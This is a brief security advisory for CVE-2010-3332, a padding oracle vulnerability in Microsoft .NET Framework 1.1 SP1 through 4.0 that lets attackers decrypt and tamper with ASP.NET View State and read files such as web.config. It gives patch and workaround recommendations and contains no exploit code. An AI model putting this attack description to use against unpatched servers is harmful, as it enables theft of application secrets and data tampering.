CVE-2010-3332

Name of the Vulnerable Software and Affected Versions Microsoft .NET Framework versions 1.1 SP1 through 4.0

Description The issue allows remote attackers to decrypt and modify encrypted View State form data via a padding oracle attack. This could possibly lead to forging cookies or reading application files. An information disclosure vulnerability exists due to improper error handling during encryption padding verification, allowing an attacker to read encrypted data, such as the view state. This vulnerability can also be used for data tampering, which could be used to decrypt and tamper with the data encrypted by the server. In Microsoft .NET Framework 3.5 Service Pack 1 and above, an attacker can retrieve the contents of any file within the ASP.NET application, including web.config.

Recommendations For Microsoft .NET Framework versions 1.1 SP1 through 4.0, update to a version that includes the fix for this issue to prevent exploitation. As a temporary workaround, consider restricting access to sensitive files within the ASP.NET application and disabling detailed error codes during decryption attempts to minimize the risk of exploitation. Avoid using the VIEWSTATE form data in sensitive operations until the issue is resolved.